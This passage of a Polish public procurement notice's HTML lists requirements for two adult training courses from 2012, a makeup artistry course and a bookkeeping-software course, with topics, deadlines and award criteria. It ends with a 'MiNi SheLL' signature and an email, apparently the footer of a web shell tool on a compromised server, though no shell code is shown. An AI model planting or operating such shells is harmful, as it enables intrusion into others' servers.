Kurs zakończony egzaminem wewnętrznym. Po zaliczeniu egzaminu uczeń powinien otrzymać dyplom ukończenia kursu oraz zaświadczenie o ukończeniu kursu zgodne z Rozporządzenie z dnia 03 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności  i kwalifikacji zawodowych w formach pozaszkolnych - Dz. U. z 2006r. Nr 31, poz.216 z późniejszymi zmianami..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Kurs wizażu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem części XI zamówienia jest organizacja i przeprowadzenie kursu wizażu.Liczba uczestników: 8.
Kurs w wymiarze co najmniej 40 godzin.
Tematyka kursu:
1.	stanowisko pracy, przybory i kuferek wizażysty
2.	charakterystyka kosmetyków do wizażu
3.	zasady dezynfekcji, czyszczenia i pielęgnacji oraz przechowywania akcesoriów wizażysty
4.	zasady higieny miejsca pracy wizażysty
5.	rodzaje oświetlenia w pracy wizażysty
6.	przygotowanie twarzy modelki do makijażu, pielęgnacja, masaż relaksacyjny, oczyszczanie twarzy, zmywanie i techniki usuwania makijażu
7.	analiza kolorystyczna, oddziaływanie barw, podział na cieple i zimne typy urody 
8.	charakterystyka i kształty twarzy, modelowanie twarzy różnymi technikami, techniki światłocienia
9.	makijaż korekcyjny i techniki kamuflażu
10.	korekta brwi - nadawanie odpowiedniej linii w zależności od kształtu twarzy
11.	korekta oczu, rodzaj i kształt - kreska, cieniowanie, eye liner, techniki malowania rzęs 
12.	korekta ust - powiększanie, zmniejszanie, wyrównanie
13.	korekta niedoskonałości twarzy - przebarwienia, pękające naczynka, cienie pod oczami, zmarszczki 
14.	makijaż dzienny dostosowywany do wykonywanego zawodu i osobowości
15.	makijaż wieczorowy - wersja matowa i błyszcząca 
16.	makijaż do okularów - dla krótkowidza i dalekowidza
17.	makijaż opadającej powieki
18.	makijaż synchroniczny
19.	makijaż ślubny i pełna stylizacja ślubna
20.	makijaż fotograficzny
21.	makijaż do zdjęć kolorowych i czarno-białych
22.	techniki doklejania ozdób do twarzy: sztuczne rzęsy, cyrkonie, brokaty, piórka i inne. 
Termin realizacji: od dnia podpisania umowy do 29.02.2012r.

Kurs zakończony egzaminem wewnętrznym. Po zaliczeniu egzaminu uczeń powinien otrzymać dyplom ukończenia kursu oraz zaświadczenie o ukończeniu kursu zgodne z Rozporządzenie z dnia 03 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności  i kwalifikacji zawodowych w formach pozaszkolnych - Dz. U. z 2006r. Nr 31, poz.216 z późniejszymi zmianami..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.02.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Kurs podstawy księgowania z umiejętnością obsługi  komputerowych programów księgowych..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem części XII zamówienia jest organizacja i przeprowadzenie kursu podstawy księgowania z umiejętnością obsługi  komputerowych programów księgowych. Liczba uczestników: 12.
Kurs w wymiarze co najmniej 60 godzin.
Tematyka kursu:
1.	Podstawy księgowości:
-Podstawy prawne i zasady prowadzenia rachunkowości,
-Dokumentacja przyjętych zasad prowadzenia rachunkowości,
-Podstawowe zasady otwierania, prowadzenia i zamykania ksiąg rachunkowych.
2.	Obsługa programów /Rachmistrz/, /Subiekt/ /Rewizor/,
3.	Obsługa program /Płatnik/.

Termin realizacji: od dnia podpisania umowy do 31.03.2012r.

Kurs zakończony egzaminem wewnętrznym. Po zaliczeniu egzaminu uczeń powinien otrzymać dyplom ukończenia kursu oraz zaświadczenie o ukończeniu kursu zgodne z Rozporządzenie z dnia 03 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności  i kwalifikacji zawodowych w formach pozaszkolnych - Dz. U. z 2006r. Nr 31, poz.216 z późniejszymi zmianami..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.03.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com